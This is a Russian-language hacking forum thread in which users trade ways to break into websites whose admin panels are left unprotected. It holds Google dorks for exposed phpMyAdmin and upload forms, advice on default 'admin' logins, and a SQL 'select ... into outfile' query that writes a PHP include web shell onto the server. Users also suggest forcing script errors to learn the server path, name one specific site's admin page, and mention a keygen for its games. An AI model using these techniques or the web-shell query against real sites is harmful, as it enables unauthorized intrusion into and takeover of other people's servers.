Сайты с открытыми админками

Ненашел похожей темы и решл создать. есть сайты админы которых полные ламеры и незащищают админки паролями. Предлагаю в этой теме давать ссылки на на сайты этих типов.

 

inurl:/phpMyAdmin/main.php

Вот тебе и список.

 

невсегда так.
иногда нужны более извращённые методы

 

inurl:main.php Welcome to phpMyAdmin

 

Можно попробовать поискать /Ftp и /uploads , например, бывает что есть обычная html страничка с формой для отправки файла на сервер. Способ 2 нахождения админки( 5-8%)
По дефолту стоит пароль и логин admin и т.п. Ну и оськомерц там вроде админка иногда без пасса или .htpasswd. Запрос для upload filetype:html inurl:uploads site:com!

 

http://forum.antichat.ru/thread40031.html
Заходим суда, тут сканер таких дир!

 

обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите

 

Вообще долго рассказывать, но например есть у тебя доступ в phpmyadmin(если есть базы). Изучаешь структуру баз(залей дамп всей или части базы на хард), затем можно просто либо проинклудить определенный параметр в таблицы определенной базы (смотри тему phpbb) либо создать файл(твой шелл), также если данная база, которую ты решил изучить имеет характер Скрипт-Галерея или какой-либо upload файлов различных расширений , что мешает добавить тот же *.php формат, дело вкуса! Удачи!

 

если есть права, выполняй запрос:

Code:

select '<?include($_GET[bravo])?>' from table into outfile '/patch/to/file.php';

 

2 p-range

блин запрос выполняеться, но пишет что неможет создать файл.

 

Ты точно узнал путь на сервере в папке, где нужно создать шелл?

 

значит нет прав.

 

Права скорей всего есть, надо просто узнать путь папки на сервере, а вот как?
может можно както сгенерировать в phpmyadmin ошибку, что б выдало где находиться.. а?

 

ты сам ответил на свой вопрос. пытайся вызвать ошибку в скриптах

 

http://nevosoft.ru/admin.php =)

лолы=)
я к ихним гамам кейген сделал, кто до чего дойдет?